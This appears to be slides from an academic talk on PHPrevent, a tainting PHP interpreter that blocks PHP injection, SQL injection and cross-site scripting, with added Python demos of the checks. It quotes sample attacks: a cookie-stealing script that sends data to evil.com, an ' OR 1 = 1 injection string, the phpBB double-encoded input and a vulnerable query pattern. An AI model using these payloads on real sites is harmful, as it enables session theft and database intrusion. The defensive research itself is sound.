Automatically Hardening Web Applications Using Precise Tainting

Automatically Hardening Web Applications Using Precise Tainting
Anh Nguyen-Tuong, Salvatore Guarnieri, Doug Greene, Jeff Shirley, David Evans
University of Virginia

phpBB Worm
- December 21, 2004
- Over 40,000 sites defaced
- PHP injection
- Loads Perl scripts to spread itself
- Uses Google to search for other phpBB sites

phpBB Vulnerability
    $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
    ...
    $highlight_match[] = ... $words[$i] ...;
    ...
    preg_replace(... $highlight_match ...)
- Original user input: '_%2527_attack
- User input after PHP has filled $HTTP_GET_VARS (one round of URL decoding, then magic quotes escape the quote): \'_%27_attack
- User input after the explicit urldecode call (a second round of decoding, run after magic quotes have already done their work): \'_'_attack
- The second quote is now unescaped. phpBB passed $highlight_match to preg_replace with the /e modifier, which evaluates the replacement as PHP code, so the unescaped quote closes the string literal and the rest of the attacker's input runs as PHP.

Classes of Attacks
- Code injection: cause user-provided data to be executed while the data is being processed
  - PHP injection (phpBB worm)
  - SQL injection
- Output generation: cause user-provided data to be displayed to visitors of the website
  - Cross Site Scripting

SQL Injection
- Attacker constructs data that injects database commands
- Example:
    $res = executeQuery("SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'");
- $user and $pwd are pasted straight into the query text, so a quote in either one ends the string literal and whatever follows it is parsed as SQL

Cross Site Scripting
- Inserts user-provided data into a web page; that data may include JavaScript
- The script executes in the origin of the hosting website, with access to its cookies and DOM
- Simple example:
    <b onmouseover='location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b>

Importance
- Over 12% of Secunia advisories
- 4 of the last 10 advisories from FrSIRT
- Cross Site Scripting and code injection are responsible for many attacks on the Internet
- It is very hard to write bug-free code

Previous Approaches
- Static techniques
- Dynamic techniques before deployment
- Dynamic techniques during deployment

Static
- Static analyzers [Shankar+ 01]
- Code inspections [Fagan76]
- SQL prepared statements [Fisk04, Php05]
- Pros
  - No runtime overhead
  - Can be done before the website is released to the public
- Cons
  - Coding practices may need to change
  - Inspections are only as good as the inspector
  - Many false positives

Dynamic Before Deployment
- Automated test suites: [Huang+ 04], [Tenable05], [Kavado05], [Offutt+ 04], [Watchfire05], [SPI05]
- Human testing
- Pros
  - Coding practices do not need to change
  - Attempts to simulate real-world attack conditions
- Cons
  - Only tests known attacks; cannot show the absence of a vulnerability
  - Requires developer effort to fix the security holes it finds

Automated Dynamic: Firewalls
- Incoming [Scott, Sharp 02]
- Incoming and outgoing [Watchfire04], [Kavado05], [Teros04]
- Pros
  - No need to modify the web service
- Cons
  - Only prevent recognized attacks
  - Coarse policies, because the firewall does not know the application's semantics

Automated: Magic Quotes
- Escape all quotes supplied by a user
- Implemented in PHP (magic_quotes_gpc) and other scripting languages
- Extremely successful
  - Do not require the programmer to do anything
  - Prevent many SQL injection attacks
- But prevent only a specific class of attacks, and only as long as the data is not decoded again afterwards (the phpBB double-decoding trace above shows exactly that failure; PHP later deprecated magic quotes in 5.3 and removed them in 5.4)

Previous Work Limitations
- Being precise about what constitutes an attack is a lot of work
- Automated techniques suffer from not exploiting the application's semantics
- We want a system that works as effortlessly as magic quotes but prevents a wider class of attacks

Our Approach
- Fully automated
- Aware of application semantics
- Replace the PHP interpreter with a modified interpreter that:
  - Keeps track of which information comes from untrusted sources (precise tainting)
  - Checks how untrusted input is used

PHPrevent
[Architecture diagram: the client sends a request to the web server (HTTP server), which runs file.php in the PHP interpreter; PHPrevent replaces that interpreter and mediates its accesses to the file system, the database and the system APIs before the response goes back to the client. Numbered arrows 1 to 8 trace the request through these components.]

Coarse Grain Tainting
- Provided by many scripting languages (Perl, Ruby)
- Untrusted input is tainted
- Everything touched by tainted data becomes tainted
    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";
- The entire $query string is tainted, even though most of it is a trusted literal written by the programmer

Precise Tainting
- Untrusted input is tainted
- Taint markings are maintained at the character level
- Propagation follows the semantics of each operation in the program
- Only the characters that actually came from untrusted input are tainted
    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";
- With $user = ' OR 1 = 1; -- '; and $pwd empty, the query becomes
    SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = ''
  and only the substring ' OR 1 = 1; -- '; that came from $user is marked tainted; the rest of the query is trusted

Precise Checking
- Wrappers around PHP functions update and check the precise taint information
- Conservative: no false negatives, while minimizing false positives
- Behaviour only changes when an attack is likely

Preventing SQL Injection
- Parse the query with the PostgreSQL parser to identify interpreted text (keywords, operators and delimiters, as opposed to the contents of string literals)
- Disallow SQL keywords or delimiters in interpreted text that is tainted
- If the check fails, the query is not sent to the database and an error response is returned
- Example, with the tainted text ' OR 1 = 1; -- '; from the user: the closing quote of '', the keyword OR, the = sign, the semicolon and the comment marker are all tainted interpreted text, so the query is rejected
    "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = ''"

Preventing PHP Injection
- Disallow tainted data in functions that treat input strings as PHP code (for example eval, or preg_replace with the /e modifier) or that manipulate system state
- We place wrappers around these functions to enforce this rule
- The phpBB attack is prevented by the wrapper around preg_replace: the second quote is still tainted after the double decoding, whatever magic quotes did to the first one
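The tainting and the two checks on the preceding slides, as an added example that is not the paper's PHPrevent code: a Python model of character-level taint propagation through concatenation, urldecode and magic quotes, a toy SQL tokenizer standing in for the PostgreSQL parser, and a code-sink wrapper of the kind the authors put around preg_replace. TaintedStr, check_sql, guard_code_sink and the tokenizer rules are my construction; the inputs are the examples from the slides.

```python
"""Added example, not the paper's PHPrevent code: character-level (precise)
tainting in Python. A TaintedStr carries one taint bit per character; the
wrappers below propagate those bits exactly, so only characters that came
from the request stay tainted. check_sql() then tokenizes the finished query
(a toy stand-in for the PostgreSQL parser the paper uses) and rejects any
keyword or delimiter that contains a tainted character."""
import re


class TaintedStr:
    def __init__(self, text, taint=None):
        self.text = text
        self.taint = list(taint) if taint is not None else [False] * len(text)
        assert len(self.taint) == len(self.text)

    @classmethod
    def untrusted(cls, text):
        """Every character of request-supplied text starts out tainted."""
        return cls(text, [True] * len(text))

    def __add__(self, other):  # each taint bit travels with its character
        if not isinstance(other, TaintedStr):
            other = TaintedStr(other)
        return TaintedStr(self.text + other.text, self.taint + other.taint)

    def __radd__(self, other):  # "literal" + tainted
        return TaintedStr(other) + self


def urldecode(s):
    """%XX decoding; a decoded character is tainted if any of its three
    source characters was ('+' to space is omitted for brevity)."""
    out, taint, i = [], [], 0
    while i < len(s.text):
        hexpair = s.text[i + 1:i + 3]
        if s.text[i] == "%" and re.fullmatch(r"[0-9A-Fa-f]{2}", hexpair):
            out.append(chr(int(hexpair, 16)))
            taint.append(any(s.taint[i:i + 3]))
            i += 3
        else:
            out.append(s.text[i])
            taint.append(s.taint[i])
            i += 1
    return TaintedStr("".join(out), taint)


def addslashes(s):
    """PHP magic quotes: the inserted backslash inherits the taint of the
    character it escapes, so escaping never launders taint."""
    out, taint = [], []
    for ch, t in zip(s.text, s.taint):
        if ch in "'\"\\\0":
            out.append("\\")
            taint.append(t)
        out.append(ch)
        taint.append(t)
    return TaintedStr("".join(out), taint)


# Toy SQL tokenizer: the *contents* of string literals are data; the quotes
# around them and every other token are interpreted by the database.
TOKEN = re.compile(r"""(?P<ws>\s+)
                      |(?P<comment>--[^\n]*)
                      |(?P<string>'(?:[^'\\]|''|\\.)*')
                      |(?P<word>[A-Za-z_][A-Za-z0-9_]*)
                      |(?P<number>\d+)
                      |(?P<op>[^\sA-Za-z0-9_])""", re.VERBOSE)


def check_sql(query):
    """Return (token, offset) for each interpreted token carrying taint.
    Tainted numbers pass: they are neither keywords nor delimiters."""
    violations = []
    for m in TOKEN.finditer(query.text):
        kind, bits = m.lastgroup, query.taint[m.start():m.end()]
        if kind in ("ws", "number"):
            continue
        tainted = (bits[0] or bits[-1]) if kind == "string" else any(bits)
        if tainted:
            violations.append((m.group(), m.start()))
    return violations


def build_login_query(user, pwd):
    # The slides' vulnerable concatenation, unchanged: the check runs later,
    # in the wrapper that hands the query to the database.
    return ("SELECT real_name FROM users WHERE user = '" + user
            + "' AND pwd = '" + pwd + "'")


def guard_code_sink(s):
    """Wrapper for functions that evaluate their argument as PHP code
    (eval, preg_replace with /e): refuse anything with a tainted character."""
    if any(s.taint):
        raise ValueError("tainted data reaching a code sink")
    return s.text


if __name__ == "__main__":
    bad = build_login_query(TaintedStr.untrusted("' OR 1 = 1; -- "), TaintedStr.untrusted(""))
    print(check_sql(bad))
    # The phpBB trace from the slides: magic quotes escape the first quote, the
    # second only appears after the explicit urldecode, and it is still tainted.
    words = urldecode(addslashes(urldecode(TaintedStr.untrusted("'_%2527_attack"))))
    print(words.text, all(words.taint))
```

A legitimate login (user alice, password s3cret) produces no violations because every tainted character sits inside a string literal whose quotes came from the template; the injected login trips on the closing quote of '', on OR, on =, on the semicolon and on the comment. Replaying the phpBB double decode ends with \'_'_attack, every character still tainted, so guard_code_sink refuses it regardless of the backslash that magic quotes added.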

Preventing Cross Site Scripting
- Wrappers around output functions
- Buffer the output, then parse the tainted output with HTML Tidy
- Check the parsed HTML against a white list to ensure there is no dangerous output
- Dangerous content was determined by examining the HTML grammar
- Sanitize by removing the offending tags
- Examples:
    <b>Hello</b>  is safe
    <b onmouseover='location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b>  is unsafe (the event-handler attribute runs script)
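The output check above, as an added example that is not the paper's code: a white-list check over buffered output that carries a per-character taint mask, using Python's html.parser instead of HTML Tidy. Tags emitted entirely by the program's own template are left alone; tags containing tainted characters must use a white-listed tag name and attribute set, and offending tags (with their matching end tags) are cut out. The white list, the render() helper and the sample comments are my assumptions for the demonstration.

```python
"""Added example (not PHPrevent's code): white-list check over output with a
per-character taint mask. The white list below is an assumption chosen for
the demo, not the paper's."""
from html.parser import HTMLParser

SAFE_TAGS = {"a", "b", "i", "em", "strong", "p", "br"}
SAFE_ATTRS = {"title", "href"}
SAFE_URL_PREFIXES = ("http://", "https://", "/")  # rejects javascript: etc.


def render(*parts):
    """Concatenate (text, untrusted) pairs into (html, taint_mask)."""
    html, taint = "", []
    for text, untrusted in parts:
        html += text
        taint += [untrusted] * len(text)
    return html, taint


class TaintedOutputChecker(HTMLParser):
    def __init__(self, html, taint):
        super().__init__()
        self.taint = taint
        self.line_starts = [0] + [i + 1 for i, c in enumerate(html) if c == "\n"]
        self.findings = []    # (tag, offset, reason)
        self.drop_spans = []  # (start, end) slices to cut from the output
        self.dropped = {}     # tag name -> start tags removed, awaiting their end tag

    def _offset(self):
        line, col = self.getpos()  # position of the '<' being handled
        return self.line_starts[line - 1] + col

    def handle_starttag(self, tag, attrs):
        start = self._offset()
        end = start + len(self.get_starttag_text())
        if not any(self.taint[start:end]):
            return  # written by the program's template, not by a user
        reasons = []
        if tag not in SAFE_TAGS:
            reasons.append("tag not in white list")
        for name, value in attrs:
            if name not in SAFE_ATTRS:
                reasons.append(f"attribute '{name}' not in white list")
            elif name == "href" and not (value or "").lower().startswith(SAFE_URL_PREFIXES):
                reasons.append("href with non-whitelisted scheme")
        if reasons:
            self.findings.append((tag, start, "; ".join(reasons)))
            self.drop_spans.append((start, end))
            self.dropped[tag] = self.dropped.get(tag, 0) + 1

    def handle_endtag(self, tag):
        start = self._offset()
        end = self.rawdata.index(">", start) + 1
        if not any(self.taint[start:end]):
            return
        if tag not in SAFE_TAGS or self.dropped.get(tag, 0) > 0:
            self.drop_spans.append((start, end))  # orphaned or forbidden end tag
            if self.dropped.get(tag, 0) > 0:
                self.dropped[tag] -= 1


def _run(html, taint):
    checker = TaintedOutputChecker(html, taint)
    checker.feed(html)
    checker.close()
    return checker


def check_output(html, taint):
    """Findings for tainted tags that violate the white list."""
    return _run(html, taint).findings


def sanitize(html, taint):
    """The output with every offending tainted tag removed."""
    out, pos = [], 0
    for start, end in sorted(_run(html, taint).drop_spans):
        out.append(html[pos:start])
        pos = end
    out.append(html[pos:])
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample: a trusted template wrapping one user comment.
    evil = render(("<p>Comment from user: ", False),
                  ("<b onmouseover='location.href=\"http://evil.com/steal.php?\"+document.cookie'>Hello</b>", True),
                  ("</p>", False))
    print(check_output(*evil))
    print(sanitize(*evil))
```

The taint mask is what makes this cheaper and safer than sanitizing the whole page: the template's own <p> is never inspected, a user-supplied <b>Hello</b> passes, and the slide's onmouseover example is reported and stripped down to Hello while the surrounding markup survives.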

Current Status
- Modified PHP interpreter: PHPrevent
- Prevents PHP injection, SQL injection and cross site scripting attacks
- Overly conservative: we have not yet specified precise semantics for most PHP functions
- Performance: initial measurements indicate the overhead is acceptable

Future Work: Theory and Analysis
- End-to-end information flow security
- Replace ad-hoc taint marking with a principled mechanism
- Analyze data flow at the interpreter level
- Infer taint specifications for PHP functions using dynamic analysis
- Verify that the taint marking in the PHP specification is consistent with the interpreter implementation

Future Work: Implementation
- Full implementation of precise tainting for the PHP APIs
- Handle persistent state: track tainting through the database store
- Multiple taint types with different checking rules
- Incorporate the modifications into the main PHP distribution

Summary
- Many websites are prone to attacks even after using current methods
- Our method:
  - Fully automated
  - Prevents large classes of attacks
  - Easy to deploy

Thank You www.cs.virginia.edu/sammyg